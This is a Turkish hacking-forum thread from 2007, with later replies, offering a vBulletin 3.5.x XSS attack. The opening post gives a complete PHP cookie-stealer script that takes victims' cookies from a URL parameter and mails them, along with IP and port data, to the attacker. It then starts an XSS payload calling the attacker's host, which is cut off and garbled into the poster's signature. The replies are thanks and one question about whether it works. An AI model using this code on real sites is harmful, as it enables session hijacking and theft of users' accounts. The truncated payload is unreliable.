THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

vBulletin 3.5.X Xss Acıgı Ile Cookıe Alma

sauron90 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2007
Nereden:
Www.TurkHackTeam.OrG
Mesajlar:
435
Konular:
71
Teşekkür (Etti):
0
Teşekkür (Aldı):
23
Ticaret:
(0) %
13-04-2007 21:24
#1
vBulletin 3.5.X Xss Acıgı Ile Cookıe Alma
§.@ THT AİLESİ daha önceden verıldıyse ozur dılerım ..

=> Xss Vbulletin 3.5.x ( test: 3.5.4 )
=> Acıgı Bulan=SpiderZ

Arkadaslar acık yenı bı acık ve maılınıze cookıelerı yolluyor yontem soyle;

(exploit.php) adında php dosya hazırlayıp ıcıne;


Code:
<?php
$ip_adresse = $_SERVER[’REMOTE_ADDR’];
if(!empty($ip_adresse))
{
echo ’il tuo ip ?: ’,$ip_adresse;
}
else
{
echo ’Impossible d\\’afficher l\\’IP’;
}
?>

<a href= "log.php"></a><?
$xx1=$HTTP_SERVER_VARS[’SERVER_PORT’];
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = ’http://’ . $HTTP_SERVER_VARS[’SERVER_NAME’] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>

<?php
$cookie = $_GET[’c’];
?>

<?php
$myemail = "YOUR ADDRESS E-MAIL";
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss Vbulletin" ;
$message = "Xss: Hacking
Ip: $ip_adresse
Cookie: $cookie
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today \\n
";
$from = "From: $myemail\\r\\n";
mail($myemail, $subject, $message, $from);
?>
Bunları koyup kaydedıyoruz ve hostumuza atıyoruz free de olur.
$myemail = "YOUR ADDRESS E-MAIL"; kodlarda bu kısma maıl adresımızı yazıyoruz..

Daha sonra bır notepad acıp ıcıne;


Code:
<pre a=’>’ ***********=’********.********=" [URL="https://tik.lat/i8a4J"] http://YOUR
--------------------- Pirates Of The Computer

Shadows Of ANGMAR

Boromir&Faramir

Lamer Bu Sitede Yapma Bize Şekil Uçururum Siteni Önümüzden Çekil.........
hack hunter - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2011
Nereden:
cyber city
Mesajlar:
501
Konular:
30
Teşekkür (Etti):
3
Teşekkür (Aldı):
24
Ticaret:
(0) %
23-07-2011 12:19
#2
eyweallah
--------------------- karışma bende
Er0in - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2011
Nereden:
System32
Mesajlar:
406
Konular:
54
Teşekkür (Etti):
44
Teşekkür (Aldı):
29
Ticaret:
(0) %
25-07-2011 09:03
#3
Teşekkürler Güzel Bilgiler...
---------------------
We Are Quidams
We Are Legion
We Can Not Capture
We Do Not Forget
We For Us...
marsel221 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
08/2010
Nereden:
Hatay
Mesajlar:
336
Konular:
27
Teşekkür (Etti):
53
Teşekkür (Aldı):
43
Ticaret:
(0) %
02-08-2011 22:30
#4
kesin işe yararmı

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler